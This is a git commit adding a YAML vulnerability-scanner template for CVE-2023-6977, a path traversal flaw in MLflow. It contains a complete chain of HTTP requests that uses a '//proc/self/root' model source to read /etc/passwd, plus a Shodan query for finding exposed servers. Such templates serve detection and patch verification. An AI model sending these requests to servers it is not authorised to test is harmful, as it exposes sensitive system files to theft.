Create CVE-2023-6977.yaml

Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>
2024-01-26 16:20:29 +09:00 · 2024-01-26 16:20:29 +09:00 · 004a0c16ff
parent aa18564f6b
commit 004a0c16ff
1 changed files with 58 additions and 0 deletions
--- a/http/cves/2023/CVE-2023-6977.yaml
+++ b/http/cves/2023/CVE-2023-6977.yaml
@ -0,0 +1,58 @@
+id: CVE-2023-6977
+
+info:
+  name: Mlflow <2.8.0 - Local File Inclusion
+  author: gy741
+  severity: high
+  description: |
+    Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation could allow an attacker to read sensitive files on the server.
+  remediation: |
+    Upgrade Mlflow to version 2.9.2 or later to mitigate the vulnerability.
+  reference:
+    - https://huntr.com/bounties/fe53bf71-3687-4711-90df-c26172880aaf
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-6977
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.5
+    cve-id: CVE-2023-6977
+    cwe-id: CWE-29
+    epss-score: 0.000840000
+    epss-percentile: 0.349130000
+    cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 3
+    vendor: lfprojects
+    product: mlflow
+    shodan-query: http.title:"mlflow"
+  tags: mlflow,oss,lfi,huntr,cve,cve2023,intrusive,lfprojects
+
+http:
+  - raw:
+      - |
+        POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json; charset=utf-8
+
+        {"name":"{{randstr}}"}
+      - |
+        POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json; charset=utf-8
+
+        {"name":"{{randstr}}","source":"//proc/self/root"}
+      - |
+        GET /model-versions/get-artifact?name={{randstr}}&path=etc%2Fpasswd&version=1 HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200